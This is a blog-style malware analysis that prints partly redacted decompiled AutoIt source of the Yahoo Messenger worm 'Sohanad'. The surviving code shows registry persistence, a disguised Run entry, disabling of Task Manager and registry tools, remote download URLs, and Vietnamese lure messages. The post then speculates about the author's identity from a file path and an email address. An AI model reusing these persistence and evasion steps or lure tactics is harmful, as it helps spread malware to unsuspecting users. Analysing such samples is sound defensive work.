Complete detail about SSVICHOSST.exe IM-Worm.Win32.Sohanad.t

File Name : SSVICHOSST.exe
Virus          : IM-Worm.Win32.Sohanad.t
The virus program was written in software “AutoIt”.
And it has been decompiled by the same software’s decompiler, “Exe2Aut v3″.
I don’t know whether anyone else has done this or not, here is the decompiled virus program:

*******************
*******************
; <AUT2EXE VERSION: 3.2.2.0>

; —————————————————————————-
; <AUT2EXE INCLUDE-START: C:\Documents and Settings\phuong anh\Desktop\nhatquanglan.au3>
; —————————————————————————-

;Written by Nhatquanglan
;contact nhatquanglan@gmail.com

; —————————————————————————-
; <AUT2EXE INCLUDE-START: C:\Program Files\AutoIt3\Include\Process.au3>
; —————————————————————————-

; Include Version:1.59  (04/20/2006)
; ——————————————————————————
;
; AutoIt Version: 3.0
; Language:       English
; Description:    Functions that assist with process management.
;
; —————————————————————–;==============================================;
; Description -   Returns a string containing the process name that

belongs to a given PID.
; Syntax -        _ProcessGetName( $iPID )
; Parameters -    $iPID – The PID of a currently running process
; Requirements -  None.
; Return Values – Success – The name of the process
;                 Failure – Blank string and sets @error
;                       1 – Process doesn’t exist
;                       2 – Error getting process list
;                       3 – No processes found
; Author(s) -     Erifash <erifash [at] gmail [dot] com>, Wouter van Kesteren.
; Notes -         Supplementary to ProcessExists().
;===========================

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonxxxxxxxxx

;===========================;
; Function Name:    _ProcessGetPriority()
; Description:      Get the  priority of an open process
; Parameter(s):     $vProcess      – PID or name of a process.
; Requirement(s):   AutoIt Beta v3.1.1.61+
;                   kernel32.dll (included with Windows)
; Return Value(s):  On Success – Returns integer corressponding to
;                   the processes’s priority:
;                     0 – Idle/Low
;                     1 – Below Normal (Not supported on Windows 95/98/ME)
;                     2 – Normal
;                     3 – Above Normal (Not supported on Windows 95/98/ME)
;                     4 – High
;                     5 – Realtime
; On Failure:       Returns -1 and sets @Error to 1
; Author(s):        Matthew Tucker
;                   Valik added Pid or Processname logic
;================;

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonxxxxxxxx
;================;
; Description:      Executes a DOS command in a hidden command window.
; Syntax:           _RunDOS( $sCommand )
; Parameter(s):     $sCommand – Command to execute
; Requirement(s):   None
; Return Value(s):  On Success – Returns the exit code of the command
;                   On Failure – Depends on RunErrorsFatal setting
; Author(s):        Jeremy Landes <jlandes at landeserve dot com>
; Note(s):          None
;
;================ 

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonxxxxxxxxx

; —————————————————————————-
; <AUT2EXE INCLUDE-END: C:\Program Files\AutoIt3\Include\Process.au3>
; —————————————————————————-
#NoTrayIcon
$name = “SSVICHOSST”
$setting = “setting”
$ini = “.ini”
$nql = “.nql”
$xls = “.xls”
$exe = “.exe”
$toigioupdate = @HOUR + 2
$toigio = @MIN + 30 xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxxxxxxxRegWrite (“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon”,”Shell”,”REG_SZ”,”Explorer.exe ” &

$name & $exe)

RegWrite (“HKEY_CURRENT_USER\Software\Microsoft\Windows\

CurrentVersion\Run”,“Yahoo Messengger”,”REG_SZ”,@SystemDir & “\” & $name & $exe)RegWrite (“HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Policies\Explorer”

,”NofolderOptions”,”REG_DWORD”,1)
RegWrite (“HKEY_CURRENT_USER\Software\Microsoft\Windows\

CurrentVersion\Policies\System”, “DisableTaskMgr”, “REG_DWORD”,1)
RegWrite (“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\

Policies\System”, “DisableRegistryTools”, “REG_DWORD”,1)
RegWrite (“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\

Schedule”,”AtTaskMaxHours”,”REG_DWORD”,0)

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxx

(“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\

Explorer\WorkgroupCrawler\Shares”,”shared”)

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxx

Func downloadurl()
 $settingurl=”http://nhatquanglan3.t35.com“

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxx

 $downloaded=”success”
 $settingurl1 = “http://nhatquanglan4.t35.com“
 

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxx 

  $myweb = “http://nhatquanglan1.0catch.com“

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxxx

  $tin[1] = “Vao day nghe bai nay di ban ” & $myweb & ” “
 EndIf
 $tin[2] = IniRead (@SystemDir & “\” & $setting & $ini,”setting”,”tin[2]“,”")
 If $tin[2] = “” Then
   $tin[2] = “Vao day nghe bai nay di ban ” & $myweb & ” “
 EndIf
 $tin[3] = IniRead (@SystemDir & “\” & $setting & $ini,”setting”,”tin[3]“,”")
 If $tin[3] = “” Then
  $tin[3] = “Biet tin gi chua, vao day coi di ” & $myweb & ” “
 EndIf
 $tin[4] = IniRead (@SystemDir & “\” & $setting & $ini,”setting”,”tin[4]“,”")
 If $tin[4] = “” Then
  $tin[4] = “Trang Web nay coi cung hay, vao coi thu di ” & $myweb & ” “
 EndIf
 $tin[5] = IniRead (@SystemDir & “\” & $setting & $ini,”setting”,”tin[5]“,”")
 If $tin[5] = “” Then
  $tin[5] = “Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi?

 Ve dau khi bao nhieu mo mong gio da vo tan… Ve dau toi biet di ve dau?  ” &$myweb &”  “
 EndIf
 $tin[6] = IniRead (@SystemDir & “\” & $setting & $ini,”setting”,”tin[6]“,”")
 If $tin[6] = “” Then
  $tin[6] = “Khoc cho nho thuong voi trong long, khoc cho noi sau nhe nhu khong. Bao nhieu yeu thuong nhung ngay qua da tan theo khoi may bay that xa… ” & $myweb & ” “
 EndIf
 $tin[7] = IniRead (@SystemDir & “\” & $setting & $ini,”setting”,”tin[7]“,”")
 If $tin[7] = “” Then
  $tin[7] = “Tha nguoi dung noi se yeu minh toi mai thoi thi gio day toi se vui hon. Gio nguoi lac loi buoc chan ve noi xa xoi, cay dang chi rieng minh toi… ” & $myweb & ” “
 EndIf
 $tin[8] = IniRead (@SystemDir & “\” & $setting & $ini,”setting”,”tin[8]“,”")
 If $tin[8] = “” Then
  $tin[8] = “Loi em noi cho tinh chung ta, nhu doan cuoi trong cuon phim buon. Nguoi da den nhu la giac mo roi ra di cho anh bat ngo… ” & $myweb & ” “
 EndIf
 $tin[9] = IniRead (@SystemDir & “\” & $setting & $ini,”setting”,”tin[9]“,”")
 If $tin[9] = “” Then
  $tin[9] = “Tra lai em niem vui khi duoc gan ben em, tra lai em loi yeu thuong em dem, tra lai em niem tin thang nam qua ta dap xay. Gio day chi la nhung ky niem buon… ” & $myweb & ” “
 EndIf
 $tieude = WinGetTitle(“Yahoo! Messenger”, “”)
 

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxxx

 If WinExists (“Bkav2006″) Then

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxx

 If WinExists (“System Configuration”) Thenxxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxxxxxxx If WinExists (“Registry”) Then
xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxxxxxxx If WinExists (“Windows Task”) Then
xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxxxxxxx If WinExists (“[FireLion]“) Then
xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxx If ProcessExists (“cmd.exe”) then
 xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxx

(“HKEY_CURRENT_USER\Software\Microsoft\Windows\

CurrentVersion\Explorer\WorkgroupCrawler\Shares”,$i)

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxxx

(“HKEY_CURRENT_USER\Software\Microsoft\Windows\

CurrentVersion\Explorer\

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxx

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxx

; —————————————————————————-
; <AUT2EXE INCLUDE-END: C:\Documents and Settings\phuong anh\Desktop\nhatquanglan.au3>
; —————————————————————————-
*******************
*******************
OBSERVATIONS:
————-
Here you can clearly see:

#; <AUT2EXE INCLUDE-START: C:\Documents and Settings\phuong anh\Desktop\nhatquanglan.au3>
>phuong anh is probably the name of the virus writer.

#;Written by Nhatquanglan
>Probably his nick name, or something else.

#;contact nhatquanglan@gmail.com
>His email id, ofcourse u can’t be sure of.

#”http://nhatquanglan4.t35.com“
#”http://nhatquanglan4.t35.com“
#”http://nhatquanglan1.0catch.com“
>His websites.
#
E may, vao day coi co con nho nay ngon lam
Vao day nghe bai nay di ban
Vao day nghe bai nay di ban
Biet tin gi chua, vao day coi di
Trang Web nay coi cung hay, vao coi thu di
Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo mong gio da vo tan… Ve dau toi biet di ve dau?
Khoc cho nho thuong voi trong long, khoc cho noi sau nhe nhu khong. Bao nhieu yeu thuong nhung ngay qua da tan theo khoi may bay that xa…
Tha nguoi dung noi se yeu minh toi mai thoi thi gio day toi se vui hon. Gio nguoi lac loi buoc chan ve noi xa xoi, cay dang chi rieng minh toi…
Loi em noi cho tinh chung ta, nhu doan cuoi trong cuon phim buon. Nguoi da den nhu la giac mo roi ra di cho anh bat ngo…
Tra lai em niem vui khi duoc gan ben em, tra lai em loi yeu thuong em dem, tra lai em niem tin thang nam qua ta dap xay. Gio day chi la nhung ky niem buon…
>The strings in the program

#Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo mong gio da vo tan… Ve dau toi biet di ve dau?
#Biet tin gi chua, vao day coi di
>Matches with the spam caused in chatting softwares caused by Nhatquanglan virus with many varients like SCVHSOT.exe, scvshosts.exe, SCVVHSOT.exe
It means the Nhatquanglan virus with many varients is most probably written by the same person.
But the new virus files can’t be decompiled, because now he uses a password kind of thing in AutoIt programs called “Passphrase”. Clever… Unless you have the password, you can’t decompile.

---

Possibly related posts: (automatically generated)

• Week of Wonders 15—What about the weekend of wonders?
• 6 Ways to Break the Da Vinci Code